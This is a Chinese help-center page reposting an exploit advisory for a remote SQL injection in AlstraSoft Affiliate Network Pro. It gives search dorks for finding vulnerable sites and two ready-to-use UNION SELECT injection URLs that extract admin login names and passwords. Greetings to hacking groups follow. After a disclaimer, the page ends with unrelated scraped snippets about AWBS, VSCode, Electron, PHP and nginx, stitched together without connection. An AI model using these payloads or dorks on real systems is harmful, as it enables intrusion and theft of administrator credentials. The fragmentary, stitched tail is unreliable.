帮助中心
解决方案
时间:2021-05-25
|___________________________________________________|
|
|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : /affiliate.htm
|
| DorK : "Affiliate Network Pro"
| DorK : inurl:"index.php?Act=directory"
|
|___________________________________________________|
Exploit:
/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1 union select 1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 from partners_admin--
Exploit 2 :
/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1 union select 1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from partners_admin--
_____________
column_name
login
passwd
_____________
____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|
| Iraqihack | FAHD | mos_chori | Silic0n
|_________________________________________________________________
Im IRAQi
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
影响版本:AWBS2.9.2 官方网站:http:// 漏洞类型:SQL注入 漏洞描述: ---Vulnerability--- http(s):
安装Remote-SSH并配置首先打开你的VSCode,找到Extensions,搜索Remote,下载Remote-Developoment插件,会自动安装其
之前的项目,引用electron的remote可以直接调用electron.remote来去使用,而近期使用electron却频繁报错???踩坑后我快速去查看了
代码一:functiongetip(){static$ip='';$ip=$_SERVER['REMOTE_ADDR'];if(isset($_SERVER['
问题nginx取$remote_addr当做真实ip,而事实上,$http_X_Forwarded_For才是用户真实ip,$remote_addr只是代理上一
